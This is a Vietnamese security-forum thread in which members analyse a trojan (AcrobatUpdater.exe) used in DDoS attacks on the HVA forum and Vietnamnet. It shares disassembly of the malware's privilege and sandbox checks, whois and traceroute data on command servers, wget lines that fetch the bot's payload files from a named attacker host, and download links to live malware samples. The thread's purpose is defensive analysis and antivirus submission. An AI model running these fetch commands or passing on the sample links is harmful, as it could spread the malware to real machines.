Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

@ Vanxuanemp: Cậu up lên mediafire giùm 2 file này: 1. C:\Documents and Settings\Quyen\Local Settings\Application Data\Google\Update\GoogleUpdate.exe 2. D:\Setup\Bo Office\Bo Ban phim\Unikey\UniKey40RC2\011109\Unikey40RC2W32\UniKeyNT.exe Gấp nhé, cảm ơn !

Phân tích tính chất vài trận DDoS HVA vừa qua.

Vanxuanemp — GMT

Đây là 2 link file mà TQN yêu cầu: http://www.mediafire.com/?47tc65lag46341h http://www.mediafire.com/?2hbcb7yc9b6lqpc Có thể nào trong công ty tôi đang có máy nào nhiễm STL, dẫn đến GG báo như vậy không? Hiện mạng trong công ty đang có mấy chú Tầu cùng làm việc! Hầu hết các phần mềm tôi bao giờ cũng vào trang chủ download về, cả bản unikey kia, cũng như là GChr!

Phân tích tính chất vài trận DDoS HVA vừa qua.

PXMMRF — GMT

mv1098 wrote:

@anh PXMMRF, conmale, bolzano_1989 Trong Windows XP đăng nhập bằng account limited khi 1 ứng dụng thay đổi trong Registry liên quan đến HKEY_LOCAL_MACHINE hoặc liên quan đến các system folder thì nó sẽ bị limited và yêu cầu chạy trên tài khoản Administrator Nhưng nếu những ứng dụng thay đổi trong Registry chỉ liên quan đến HKEY_CURRENT_USER thì nó vẫn có thể thực hiện được. ( ở đây là các ứng dụng chưa được setup trên Windows trước đó )

Khi dùng tài khoản limited trong WinXP (SP2 hoặc SP3)và không điều chỉnh "Security Options" trong computer management (để ở chế đô default) thì có thể cài và chạy một soft hay application trong các trường hợp sau: - Portable soft. - Stand-alone soft., application - Application đươc soạn thảo dùng cho all users (thí dụ các trình duyệt) Soft hay application không cài đươc và/hoăc không chạy khi trong quá trình cài đặt hay chạy nó phải access vào các folder/file mà account limited không có quyền mở, kích hoạt các service mà nó không có quyền, cũng như tạo một số loại registry không đươc phép.... Quay lai trường hợp cụ thể của STL virus AcrobatUpdater.exe thì: - Khi cài vào XP với quyền Admin 1 hoăc Admin 2 (Admin1 có khác Admin2 đấy nhé) thì AcrobatUpdater.exe được cài vào thư muc C/Program files/, như anh conmale đã viết. - Khi cài vào XP với quyền Limited thì nó tự đông được cài vào một thư muc khác: thư muc của chính user ấy trong C/Documents and settings/ và vẫn tao ra registry, đủ để active. Xin minh hoạ bằng hình cụ thể (các bạn xem cho sướng con mắt mình. Hì hì)

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

@ Vanxuanemp: cả hai file trên đều là file sạch. Cậu check tính năng "Verify Image Signatures" trong menu Options của Process Explorer lên, sau đó cậu chịu khó zip tất cả các exe mà Process Explorer báo là "Unable to Verify" lại, up lên mediafire nhé ! Một bài viết rất hay trên SysInternals vừa được public, mô tả tương đối chi tiết cách dùng các tool của SysInternals để detect và kill malware, các bạn chịu khó đọc nhé: http://download.sysinternals.com/Files/SysinternalsMalwareCleaning.pdf Đợi mẫu của bạn !

Phân tích tính chất vài trận DDoS HVA vừa qua.

sonngh — GMT

TQN wrote:

1. Tại sao có mấy file mạo danh của stl không có đuôi .exe, tui không double click vô thì làm sao nhiểm virus vô máy tui được ? 2. Nhiều file như StaticCaches.dat, uxtheme.manifest... là các DLL. Các DLL này làm sao tự run được ? 3. Nó download bmp về thì làm sao sinh ra bot mới được ?

a TQN xin cho e trích ngang bài viết này vì e đã đọc tới trang 17 rồi,nhưng vẫn chưa hiểu cách thức trên,em mong anh có 1 bài viết phân tích để e và các bạn khác nắm rõ hơn được không a ? vì e cũng là IT nhưng vẫn còn mù mờ về vấn đề này :-/ Cám ơn a !

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Từ từ mình sẽ post sau, mẫu của stl thì nhiều lắm, phân tích hoạt động của chỉ 1 file thôi đã mấy chục tấm hình rồi. Bà con thân mến, sau khi second.dinest.com die, giờ stl lại nhảy qua Nhật, thuê webserver bên đó để đặt xc.jpg và xv.jpg: Code:

wget -t3 "http://high.paploz.com/xv.jpg" -U"An0nym0453"
wget -t3 "http://high.paploz.com/xc.jpg" -U"An0nym0453"

Host high.paploz.com có IP: 46.166.147.48. Nhờ anh PXMMRF kiểm tra host này. top.jpg, xc.jpg, xv.jpg được đặt lên webserver vào ngày 18-10-2011, 3h chiều. File AcrobatUpdater.exe này có modify code một số, nhưng cơ bản vẫn là VB và các phương thức tấn công bằng HTTP protocol dùng socket. File ngày 15-08-2011: http://www.mediafire.com/?vp9spwf2bnx7e5i File ngày 20-08-2011: http://www.mediafire.com/?6qj9841rxvone83

Phân tích tính chất vài trận DDoS HVA vừa qua.

sonngh — GMT

Domain Name: PAPLOZ.COM Registrar: ENOM, INC. Whois Server: whois.enom.com Referral URL: www.enom.com Name Server: NS1.AFRAID.ORG Name Server: NS2.AFRAID.ORG Name Server: NS3.AFRAID.ORG Name Server: NS4.AFRAID.ORG Status: clientTransferProhibited Updated Date: 01-aug-2011 Creation date: 01 Aug 2011 08:59:00 Expiration date: 01 Aug 2012 00:59:00 IP Xem hình :

Công nhận nhóm này cũng chịu chơi thiệt .

Phân tích tính chất vài trận DDoS HVA vừa qua.

phuongnvt — GMT

Reverse IP Domain Check

Found 2 domains hosted on the same web server as high.paploz.com (46.166.147.48). high.paploz.com (linkback) second.dinest.net (linkback)

who is hosting this

high.paploz.com high.paploz.com Is Hosted by Santrex RU VPS Services Hosting: Santrex RU VPS Services host the domain high.paploz.com IP Address: 46.166.147.48 Visit Santrex RU VPS Services now

WHOIS

Visit AboutUs.org for more information about paploz.com AboutUs: paploz.com Domain name: paploz.com Registrant Contact: Whois Privacy Protection Service, Inc. Whois Agent () Fax: PMB 368, 14150 NE 20th St - F1 C/O paploz.com Bellevue, WA 98007 US Administrative Contact: Whois Privacy Protection Service, Inc. Whois Agent (yvrpwlywpp@whoisprivacyprotect.com) +1.4252740657 Fax: +1.4259744730 PMB 368, 14150 NE 20th St - F1 C/O paploz.com Bellevue, WA 98007 US Technical Contact: Whois Privacy Protection Service, Inc. Whois Agent (yvrpwlywpp@whoisprivacyprotect.com) +1.4252740657 Fax: +1.4259744730 PMB 368, 14150 NE 20th St - F1 C/O paploz.com Bellevue, WA 98007 US Status: Locked Name Servers: ns1.afraid.org ns2.afraid.org ns3.afraid.org ns4.afraid.org Creation date: 01 Aug 2011 08:59:00 Expiration date: 01 Aug 2012 00:59:00 Get Noticed on the Internet! Increase visibility for this domain name by listing it at www.whoisbusinesslistings.com =-=-=-= The data in this whois database is provided to you for information purposes only, that is, to assist you in obtaining information about or related to a domain name registration record. We make this information available "as is," and do not guarantee its accuracy. By submitting a whois query, you agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data to: (1) enable high volume, automated, electronic processes that stress or load this whois database system providing you this information; or (2) allow, enable, or otherwise support the transmission of mass unsolicited, commercial advertising or solicitations via direct mail, electronic mail, or by telephone. The compilation, repackaging, dissemination or other use of this data is expressly prohibited without prior written consent from us. We reserve the right to modify these terms at any time. By submitting this query, you agree to abide by these terms. Version 6.3 4/3/2002 Registrar: ENOM, INC. Whois Server: whois.enom.com Creation Date: 01-AUG-2011 Updated Date: 01-AUG-2011 Expiration Date: 01-AUG-2012 Nameserver: NS1.AFRAID.ORG Nameserver: NS2.AFRAID.ORG Nameserver: NS3.AFRAID.ORG Nameserver: NS4.AFRAID.ORG

Visual Trace Route Tool

Host trace to high.paploz.com 22 hops / 47.4 seconds 1. dreamhost.com United States 2. dreamhost.com United States 3. ntt.net United States 4. ntt.net United States 5. ntt.net United States 6. ntt.net United States 7. ntt.net United States 8. ntt.net United States 9. ntt.net Germany 10. ntt.net Belgium 11. edpnet.net Belgium 12. edpnet.net Belgium 13. edpnet.net Belgium 14. edpnet.net Belgium 15. edpnet.net Russian Federation 16. westcall.ru Russian Federation 17. 82.199.119.33 Russian Federation 18. 82.199.119.146 Russian Federation 19. cod-rt1.tel.ru Russian Federation 20. iqhost.ru France 21. santrex.net 22. 46.166.147.48

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

PXMMRF wrote:

Quay lai trường hợp cụ thể của STL virus AcrobatUpdater.exe thì: - Khi cài vào XP với quyền Admin 1 hoăc Admin 2 (Admin1 có khác Admin2 đấy nhé) thì AcrobatUpdater.exe được cài vào thư muc C/Program files/, như anh conmale đã viết. - Khi cài vào XP với quyền Limited thì nó tự đông được cài vào một thư muc khác: thư muc của chính user ấy trong C/Documents and settings/ và vẫn tao ra registry, đủ để active. Xin minh hoạ bằng hình cụ thể (các bạn xem cho sướng con mắt mình. Hì hì)

Hôm nay rảnh rang, em coi kỹ lại thì đúng là bản XP SP3 em lấy từ CDE của công ty ra không phải là mặc định policies. Đây là bản "ghost" đã được điều chỉnh khá nhiều. Nó không cho phép người dùng bình thường chép thông tin vô c:\program files và cũng không cho user access registry. Thử lại stl malware bằng account thường trên bản xp sp3 này thì quả thật nó tạo AcrobatUpdater.exe trong "Application Data" nhưng không thể thêm bớt gì trong registry hết. Tóm lại, bolzano_1989 nhận xét đúng. Trên Windows XP (default), chạy bằng user bình thường vẫn có thể bị nhiễm stl malware. Malware này chỉ không nhiễm khi local policies được áp đặt cụ thể.

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Không quan trọng đâu anh conmale. Code của stl luôn luôn check user có phải thuộc nhóm admin hay không. Có: Chép vào %Program Files% hay %WinDir%, ghi vào HKLM. Không: Chép vào %AppData% của user, ghi vào HKCU. Cách code này xuyên suốt từ các con "mèo què" đầu tiên tới giờ. Dưới đây là đoạn code phổ biến mà stl coder thường dùng trong các "trò mèo" (viết mèo què khó viết hơn) của stl: Code:

.text:00401353         mov     [ebp+IsAdmin], ebx      ; ebx = 0
.text:00401359         mov     dword ptr [ebp+pIdentifierAuthority.Value], ebx
.text:0040135F         mov     word ptr [ebp+pIdentifierAuthority.Value+4], 500h ; Value[4] = 0; Value[5] = SECURITY_NT_AUTHORITY
.text:00401368         lea     eax, [ebp+pSid]
.text:0040136E         push    eax                     ; pSid
.text:0040136F         push    ebx                     ; nSubAuthority7 = 0
.text:00401370         push    ebx                     ; nSubAuthority6 = 0
.text:00401371         push    ebx                     ; nSubAuthority5 = 0
.text:00401372         push    ebx                     ; nSubAuthority4 = 0
.text:00401373         push    ebx                     ; nSubAuthority3 = 0
.text:00401374         push    ebx                     ; nSubAuthority2 = 0
.text:00401375         push    DOMAIN_ALIAS_RID_ADMINS ; nSubAuthority1
.text:0040137A         push    SECURITY_BUILTIN_DOMAIN_RID ; nSubAuthority0
.text:0040137C         push    2                       ; nSubAuthorityCount
.text:0040137E         lea     ecx, [ebp+pIdentifierAuthority]
.text:00401384         push    ecx                     ; pIdentifierAuthority
.text:00401385         call    ds:AllocateAndInitializeSid
.text:0040138B         mov     [ebp+IsAdmin], eax
.text:00401391         cmp     eax, ebx
.text:00401393         jz      short @@UserIsLimit
.text:00401395         lea     edx, [ebp+IsAdmin]
.text:0040139B         push    edx                     ; IsMember
.text:0040139C         mov     eax, [ebp+pSid]
.text:004013A2         push    eax                     ; SidToCheck
.text:004013A3         push    ebx                     ; TokenHandle
.text:004013A4         call    ds:CheckTokenMembership
.text:004013AA         test    eax, eax
.text:004013AC         jnz     short @@UserIsAdmin
.text:004013AE         mov     [ebp+IsAdmin], ebx
.text:004013B4 @@UserIsAdmin:                          ; CODE XREF: Infect+13Cj
.text:004013B4         mov     ecx, [ebp+pSid]
.text:004013BA         push    ecx                     ; pSid
.text:004013BB         call    ds:FreeSid
.text:004013C1         mov     eax, [ebp+IsAdmin]
.text:004013C7 @@UserIsLimit:                          ; CODE XREF: Infect+123j
.text:004013C7         push    ebx                     ; fCreate
.text:004013C8         lea     edx, [ebp+PathName]
.text:004013CE         mov     esi, ds:SHGetSpecialFolderPathW
.text:004013D4         cmp     eax, 1
.text:004013D7         jnz     @@NormalUser
.text:004013DD         push    CSIDL_PROGRAM_FILES     ; csidl
.text:004013DF         push    edx                     ; pszPath
.text:004013E0         push    ebx                     ; hwnd
.text:004013E1         call    esi ; SHGetSpecialFolderPathW
.text:004013E3         cmp     eax, 1
.text:004013E6         jnz     @@Return
.text:004013EC         push    ebx                     ; fCreate
.text:004013ED         push    CSIDL_PROGRAM_FILES     ; csidl
.text:004013EF         lea     eax, [ebp+FileName]
.text:004013F5         push    eax                     ; pszPath
.text:004013F6         push    ebx                     ; hwnd
.text:004013F7         call    esi ; SHGetSpecialFolderPathW
.text:004013F9         cmp     eax, 1
.text:004013FC         jnz     @@Return
.text:00401402         lea     ecx, [ebp+pMore]
.text:00401408         mov     edx, offset szSandboxie ; "Sandboxie"
.text:0040140D         call    Xor_5_Decode
.text:00401412         cmp     eax, 1
.text:00401415         jnz     @@Return
.text:0040141B         lea     ecx, [ebp+var_A44]
.text:00401421         mov     edx, offset szSbieSvc_exe ; "SbieSvc.exe"
.text:00401426         call    Xor_5_Decode
.text:0040142B         cmp     eax, 1
.text:0040142E         jnz     @@Return
.text:00401434         lea     ecx, [ebp+var_83C]
.text:0040143A         mov     edx, offset szSbieMgm_dll ; "SbieMgm.dll"
.text:0040143F         call    Xor_5_Decode
.text:00401444         cmp     eax, 1
.text:00401447         jnz     @@Return
.text:0040144D         lea     ecx, [ebp+pMore]
.text:00401453         push    ecx                     ; pMore
.text:00401454         lea     edx, [ebp+PathName]
.text:0040145A         push    edx                     ; pszPath
.text:0040145B         mov     edi, PathAppendW
.text:00401461         call    edi ; PathAppendW

Từ thời còn WinNT4, 2000, mấy cái hàm AllocateAndInitializeSid, CheckTokenxxx... là em đã code rồi, thời còn help = WinHelp kìa, bởi vậy em nhìn là thấy ngay ;) Các hàm quen thuộc mà stl coder thường dùng là memset, memcpy, SHGetSpecialFolderPath..., fread, fwrite, fseek (dùng nhiều nhất cho lấy kích thước - size của file)... PS: Tới hiện nay em vẫn chưa có mẩu đang ddos Vietnamnet và ddos hva với User-Agent string đặc biệt. Bà con tiếp tục nhé ! Những ai không vào blogspot của Gấu gồ được thì chắc chắn 100% là mạng các bạn đã dính bot và virus nằm vùng của stl. 2 sonngh: Không gọi là nhóm được đâu, theo tôi, phải gọi là phòng, ban hay cơ quan gì đó mới đúng ! Mấy anh stl lúc đầu rêu rao, hù doạ người ta là một nhóm "du học sinh", "du học sinh" cái con khỉ, "du côn sinh (ra)" thì có ! Em nói có phải không mấy anh stl ? Nội cái tên stl mấy anh mang lên người không còn bị vô số biến thể, nhiều hơn số biến thể trò mèo xxx của mấy anh rồi =)) Thông thường, em hay disable KIS của em, khi cần quét mới quét. Lúc nãy vô tình enable KIS, wget thử images01.gif từ penop.net, KIS nhảy ra liền, ê, địa chỉ độc hại, tao cấm. Hì hì, vậy cũng được ;)

Phân tích tính chất vài trận DDoS HVA vừa qua.

Vanxuanemp — GMT

@TQN: mãi không upload lên được medifire, thôi đành up lên hotfile vậy http://hotfile.com/dl/127328046/43818c0/Unabletoverify.zip.html anh xem giúp có file nào là nhiễm trojan không??

Phân tích tính chất vài trận DDoS HVA vừa qua.

PXMMRF — GMT

TQN wrote:

Từ từ mình sẽ post sau, mẫu của stl thì nhiều lắm, phân tích hoạt động của chỉ 1 file thôi đã mấy chục tấm hình rồi. Bà con thân mến, sau khi second.dinest.com die, giờ stl lại nhảy qua Nhật, thuê webserver bên đó để đặt xc.jpg và xv.jpg: Code:
wget -t3 "http://high.paploz.com/xv.jpg" -U"An0nym0453"
wget -t3 "http://high.paploz.com/xc.jpg" -U"An0nym0453"
Host high.paploz.com có IP: 46.166.147.48. Nhờ anh PXMMRF kiểm tra host này. top.jpg, xc.jpg, xv.jpg được đặt lên webserver vào ngày 18-10-2011, 3h chiều. File AcrobatUpdater.exe này có modify code một số, nhưng cơ bản vẫn là VB và các phương thức tấn công bằng HTTP protocol dùng socket. File ngày 15-08-2011: http://www.mediafire.com/?vp9spwf2bnx7e5i File ngày 20-08-2011: http://www.mediafire.com/?6qj9841rxvone83

Có đây TQN à. high.paploz.com Whois---> privacy protected - IP 46.166.147.48 - Trên webserver chỉ hosting một website này (high.paploz.com) - Web server (Trình quản lý website) NGINX 1.1.0 ( giống như các webserver khác của STL) - Sử dụng các nameserver như các webserver khác của STL. Có vẻ như STL có mối liên quan chặt chẽ với công ty quản lý nameserver, hay có tay trong ở đây. Nên việc chuyển IP cho webserver (điều chỉnh Record A) thuận lơi và nhanh chóng hơn bình thường. - Địa chỉ đặt webserver: NGA (Russian) - Webserver mở cổng 80 TCP HTTP (webser được cài đặt vào khoảng 5,6-8-2011, mở ngày nào thì không rõ) - File top.jpg đã bị removed (5.00PM 20-8-2011) - File xv.jpg chỉ là 1 file .txt bình thường value của nó là: 2011-08-18 15:22:46 (Có lẽ đây là giờ tấn công vào một website nào đó? ) - File xc.jpg -đươc protected- nhờ TQN RCE giùm. Thanks Xem visual route

Special Note: Chỉ là giỡn chơi. Đố các bạn trong hình visual route mà tôi post trên đây có chứa(embedded) cái gì. Nôi dung thế nào. Ai biết xin hậu tạ chầu bia. Chỉ là giỡn vui cho giảm stress chút ít thôi. Hì hì.

Phân tích tính chất vài trận DDoS HVA vừa qua.

weasel1026789 — GMT

Các bạn HVA nhiệt tình quá, kiểu này thì STL phải thâm hụt ngân quỹ nặng :D Có ai làm cái tổng kết xem STL đã tốn bao nhiêu tiền để mua domain mới kể từ khi bị phanh phui không nhỉ.

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

U, ăn thua gì, mấy cái lẻ tẻ đó thì ăn thua với ngân quỹ của mấy anh stl. Mấy anh ấy tiền vô số, mà đâu phải tiền của mấy anh làm ra đâu mà sợ, phải không mấy anh ?

Phân tích tính chất vài trận DDoS HVA vừa qua.

tmd — GMT

TQN wrote:

Có: Chép vào %Program Files% hay %WinDir%, ghi vào HKLM. Không: Chép vào %AppData% của user, ghi vào HKCU.

Nhiêu đây công đoạn lây lan là Đủ để bất kỳ thứ gì chạy được trên windows.

Phân tích tính chất vài trận DDoS HVA vừa qua.

phanledaivuong — GMT

weasel1026789 wrote:

Các bạn HVA nhiệt tình quá, kiểu này thì STL phải thâm hụt ngân quỹ nặng :D Có ai làm cái tổng kết xem STL đã tốn bao nhiêu tiền để mua domain mới kể từ khi bị phanh phui không nhỉ.

Theo mình nghĩ bọn Sờ Ti Lợn này đã dùng nhiều trò ăn cắp email và tài khoản cá nhân của mọi người trên Internet thì kiểu gì chúng nó cũng dùng "Credit Card chùa" để mua sắm Domain. Quá khứ ở Đức cho thấy rất nhiều người đã liều chết để trèo qua tường Berlin từ Đông sang Tây nhiều lắm. ngày nay bọn Sờ Ti Lợn này lại muốn ở bên phía đông thành lợn cho tụi nó sờ ti đây mà =)). sang phía tây cái là Sờ Ti Lợn chắc là đi sờ ty nhau =)) Không nên cố giữ những gì sắp lụi tàn ... nó là vòng luân hồi rồi ... Khi bức tường được phá để tất cả thành phía tây thì lúc đấy mấy con Sờ Ti Lợn này sẽ bị cắt tiết hết.

Phân tích tính chất vài trận DDoS HVA vừa qua.

.lht. — GMT

Không có sài chùa đâu bạn ;)) Nếu như theo dõi các reply của mọi người, chắc hẳn ai cũng nhận ra STL là 1 tổ chức lớn và không đơn giản, có được hỗ trợ lớn về nhiều mặt. Vậy tại sao phải dùng CC chùa ? Mà đã là "tổ chức lớn" thì ai lại động đến CC chùa nhỉ ?

Phân tích tính chất vài trận DDoS HVA vừa qua.

.lht. — GMT

@TQN: Liệu trong những virus của STL có sử dụng những kĩ thuật nâng quyền, ring0 Access, ... không anh ? Hay nói cách khác là virus của STL can thiệp đến mức độ nào vào hệ thống rùi ạ ?

Phân tích tính chất vài trận DDoS HVA vừa qua.

phanledaivuong — GMT

.lht. wrote:

Không có sài chùa đâu bạn ;)) Nếu như theo dõi các reply của mọi người, chắc hẳn ai cũng nhận ra STL là 1 tổ chức lớn và không đơn giản, có được hỗ trợ lớn về nhiều mặt. Vậy tại sao phải dùng CC chùa ? Mà đã là "tổ chức lớn" thì ai lại động đến CC chùa nhỉ ?

Tổ chức lớn có 2 loại bạn ạ: Tổ chức sạch và bẩn. Tổ chức bẩn thì chắc chắn sẽ dùng tiền bẩn. STL khi reg đều cần phải giấu kín thông tin về mình. thứ nhất là sẽ sử dụng các dịch vụ private information của các nhà cung cấp hosting và domain. thứ 2 là nhờ 1 người khác đứng tên, nhưng cả 2 cách này có vẻ không an toàn cho lắm. cách an toàn nhất và hay nhất là sử dụng 1 thằng mà nó không biết mình và tội gì không dùng tiền nó luôn, bọn STL này dùng trò cắp password thì tha gì không xài luôn cc chùa. các dự án ở việt nam thường được mấy lão xếp tổng đưa và chi cho 1 đống tiền, rồi làm đi. cứ thấy có cái kết quả là được. mặc dù kết quả không cần biết là bệnh thành tích hay không ;)) vì vậy cái tổ chức này thì thằng sếp đầu đất cũng quang 1 cục tiền cho cái nhóm đấy. rồi chúng nó sẽ chia nhau tiêu tiền, xài cc chùa mua hosting với domain an toàn mà tiết kiện được 1 khoản để anh em trong nhóm chia chác nhau.

Phân tích tính chất vài trận DDoS HVA vừa qua.

.lht. — GMT

Phân tích rất hay, chuẩn với nhiều tổ chức ! Nhưng với STL thì mình cảm thấy ngược lại ;) Đơn giản mà, nếu dùng CC chùa để đăng kí máy chủ. Cứ cho là qua mặt được bước verify tài khoản và được phép sử dụng. Nhưng liệu trong quá trình sử dụng, với mục đich của STL thì khả năng bị block tài khoản rất lớn ;) Mà đến tận bây giờ, nó vẫn live sờ sờ ra đó. Phải chăng máy chủ được đăng kí bằng tiền của họ mới đảm bảo như vậy ... ? :D

Phân tích tính chất vài trận DDoS HVA vừa qua.

PXMMRF — GMT

Tôi đã tìm ra file virus (process) hiện đang tấn công vào HVA Process này mở rất nhiều và liên tục các thread (cổng TCP) kết nối- tấn công vào cổng 80 TCP của website HVA. Nhịp độ tấn công khá mạnh, khoảng 5-6 kết nối trong một giây (với máy có cấu hình thấp, tốc độ CPU chậm-máy tôi đang thí nghiệm). Gói tin tấn công có dung lương từ 25-62 Bytes. Quá trình tấn công này không thông qua trình duyệt mà từ process tấn công thẳng vào cổng 80 TCP của HVA webserver. Ngay khi bị nhiễm vào máy process khởi phát tự động quá trình tấn công và cũng tự kích hoat khi máy khởi đông lại. Tuy vẫn dùng tên file (process) cũ, là AcrobatUpdater.exe, nhưng đây lai là file có cấu trúc mới. Chúng hoàn toàn không bị Avira antivirus phát hiện khi đươc cài vào máy và ngay cả khi scan thẳng vào file. (AcrobatUpdater.exe cũ - TQN cung cấp vào khoảng 28-7-2011 và 5-8-2011 bị Avira Antivirus phát hiện dễ dàng) File virus này có tên là "AcrobatUpdater_20_08_2011" (theo anh TQN đặt lúc upload lên mạng) Có lẽ đây cũng là file (process) vừa mới đây tấn công DDoS vào vietnamnet.net

Phân tích tính chất vài trận DDoS HVA vừa qua.

PXMMRF — GMT

Theo thông lệ quốc tế, HVA chúng tôi đặt tên trojạn này là TRJ/hvadetec-1 (Xin anh conmale và TQN góp ý thêm) Virus-Trojan do các hacker mũ đen bất kỳ, nào đó tạo ra và gây lây nhiễm trên mạng (trường hợp này là STL), tổ chức phát hiện đầu tiên ra nó và tư vấn cách diệt nó trong hệ thống máy, có quyền đặt tên cho nó. Trân trọng đề nghi các công ty Antivius, đăc biệt là các công ty VN tôn trọng thông lệ này. Xin anh TQN và acoutic...RCE kỹ nó và tư vấn cách diệt đơn giản, hiệu quả nhất mà một user thông thường có thể áp dụng. Nên viết một "Virus-Trojan Removal tool" nhỏ để diệt con này và có thể cả các trojan-virus khác của STL và phổ biến trên mạng Chúng tôi (conmale, TQN và tôi) đang tiếp tục tìm hiểu thêm về Trojan đang tấn công vào vietnamnet.net, tờ báo mạng chúng tôi có cảm tình

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Nó không mới đâu anh PXM. Vẫn là AcrobatUpdater.exe cũ, được down về từ http://penop.net/images01.gif. Code của con này vẫn vậy, chỉ khác các con AcrobatUpdater.exe cũ ở chổ fix một số bug, cải tiến một số hàm, còn lại cơ bản vẫn không đổi, không thêm thêm được 1 hàm nào cả. Em đã upload nó lên 1 loạt AVs rồi, chờ update thôi anh ! Vấn đề quan trọng bây giờ là tìm ra mẫu đang ddos Vietnamnet, tìm ra cái C&C webserver giấu mặt này của bọn stl. Các bạn đừng sợ, ngại ngùng gì cả, các bạn chỉ tìm mẫu, up mẫu thì mắc mớ cái gì phải sợ, sợ stl, sợ pháp luật à ? Pháp luật nào cấm các bạn tham gia HVA forum, cấm tham gia thảo luận, RCE virus, cấm tìm và up mẫu virus ????? Tôi nói vậy vì có nhiều bạn PM, mail cho tui để gởi mẫu, nhưng lại sợ tôi nói ra nick HVA, mail address của các bạn. Dĩ nhiên là tôi sẽ làm theo yêu cầu của các bạn. Nhưng tôi lại ngạc nhiên, sao lại phải sợ, tôi, anh PXMMRF, accourics.... và nhiều anh em HVA trong nước không sợ thì tại sao các bạn lại sợ ???????? 2 .lht.: Trò mèo của stl chỉ ở mức user mode, code = C/C++ & VB, hoạt động bình thường ở mức user mode như các app bình thường khác. Coder của stl chưa dùng 1 kỹ thuật pure ASM tiên tiến nào mà giới virus writer thế giới đang dùng, và cũng chưa đụng tới kernel driver. Khi nào tụi nó đụng tới rootkit tui sẽ post phân tích. Đang luyện lại SoftIce và WinDbg để chuẩn bị debug rootkit của mấy anh stl, bỏ lâu lụt nghề rồi.

Phân tích tính chất vài trận DDoS HVA vừa qua.

kutruoi — GMT

TQN wrote:

Nó không mới đâu anh PXM. Vẫn là AcrobatUpdater.exe cũ, được down về từ http://penop.net/images01.gif. Code của con này vẫn vậy, chỉ khác các con AcrobatUpdater.exe cũ ở chổ fix một số bug, cải tiến một số hàm, còn lại cơ bản vẫn không đổi, không thêm thêm được 1 hàm nào cả. Em đã upload nó lên 1 loạt AVs rồi, chờ update thôi anh ! [/b][/color]

@TQN : anh ơi, nếu như version cũ của con trojan AcrobatUpdater.exe chưa được đặt tên, và anh PXMMFX đã đặt tên cho phiên bản mới version 2, của con này thì theo em vẫn được xem là tên của một thể Trojan mới mà derivative từ phiên bản cũ mà. đương nhiên là bọn sư tổ lợn này sẽ chỉ biến thể , và phát triển những con malware này trên nền tảng những con đầu tiên chúng ị ra mà thôi, vì trí tuệ chúng có thế thôi mà hì hì . còn trong danh sách đó vẫn còn một con mà đang ddogs vietnamnet giấu mặt hả anh ??? thế thì fia' Vietnamet Admins phải có những nghiên cứu từ các nguồn dos và kết hợp với các anh mà tìm ra chứ nhỉ ? chúc anh một ngay happy day

Phân tích tính chất vài trận DDoS HVA vừa qua.

tranvanminh — GMT

TQN wrote:

Nó không mới đâu anh PXM. Vẫn là AcrobatUpdater.exe cũ, được down về từ http://penop.net/images01.gif. Code của con này vẫn vậy, chỉ khác các con AcrobatUpdater.exe cũ ở chổ fix một số bug, cải tiến một số hàm, còn lại cơ bản vẫn không đổi, không thêm thêm được 1 hàm nào cả. Em đã upload nó lên 1 loạt AVs rồi, chờ update thôi anh ! Vấn đề quan trọng bây giờ là tìm ra mẫu đang ddos Vietnamnet, tìm ra cái C&C webserver giấu mặt này của bọn stl. Các bạn đừng sợ, ngại ngùng gì cả, các bạn chỉ tìm mẫu, up mẫu thì mắc mớ cái gì phải sợ, sợ stl, sợ pháp luật à ? Pháp luật nào cấm các bạn tham gia HVA forum, cấm tham gia thảo luận, RCE virus, cấm tìm và up mẫu virus ????? Tôi nói vậy vì có nhiều bạn PM, mail cho tui để gởi mẫu, nhưng lại sợ tôi nói ra nick HVA, mail address của các bạn. Dĩ nhiên là tôi sẽ làm theo yêu cầu của các bạn. Nhưng tôi lại ngạc nhiên, sao lại phải sợ, tôi, anh PXMMRF, accourics.... và nhiều anh em HVA trong nước không sợ thì tại sao các bạn lại sợ ???????? 2 .lht.: Trò mèo của stl chỉ ở mức user mode, code = C/C++ & VB, hoạt động bình thường ở mức user mode như các app bình thường khác. Coder của stl chưa dùng 1 kỹ thuật pure ASM tiên tiến nào mà giới virus writer thế giới đang dùng, và cũng chưa đụng tới kernel driver. Khi nào tụi nó đụng tới rootkit tui sẽ post phân tích. Đang luyện lại SoftIce và WinDbg để chuẩn bị debug rootkit của mấy anh stl, bỏ lâu lụt nghề rồi.

Anh TQN có up lên cho Microsoft không ? KIS em mua bị đứng hoài nên trở lại dùng MSE rồi. AV nào trả lời, chưa trả lời anh cho mọi người biết luôn để yên tâm.

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Anh chỉ up lên KIS, Avira, MS. Avira update và trả lời, phản hồi nhanh nhất. Bà con phụ một tay, vào thư mục sau: http://www.mediafire.com/?tz745o0f678w8, xếp theo ngày, down về và up lên các AVs khác giùm.

Phân tích tính chất vài trận DDoS HVA vừa qua.

weasel1026789 — GMT

Mình dùng thằng NIS2011 scan cái AdobatUpdater mới nhất mà nó không phát hiện được là virus, mình submit lên web của nó rồi, hi vọng nó trả lời sớm.

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

2 vndncn: Google: submit malware sample Trước mắt, các bạn chịu khó search trên máy các bạn, nếu có tìm thấy file: GoogleCrashHandler.exe, vui lòng upload lên đâu đó giùm anh em kỹ thuật của HVA. Cảm ơn nhiều ! Vì GoogleCrashHandler.exe, GoogleUpdater.exe nguyên bản là file của Google, stl coder build ra file khác nhưng vẫn giả danh (dùng cùng tên) với file của Google, nên tui mạn phép hướng dẫn các bạn kiểm tra file sạch của Google bằng hình sau:

File nào cũng vậy, nếu right click, property ra hình trên thì là file sạch, có Digital Signatures, còn không có thì là file virus.

Phân tích tính chất vài trận DDoS HVA vừa qua.

sacroyant — GMT

TQN wrote:

2 vndncn: Google: submit malware sample Trước mắt, các bạn chịu khó search trên máy các bạn, nếu có tìm thấy file: GoogleCrashHandler.exe, vui lòng upload lên đâu đó giùm anh em kỹ thuật của HVA. Cảm ơn nhiều !

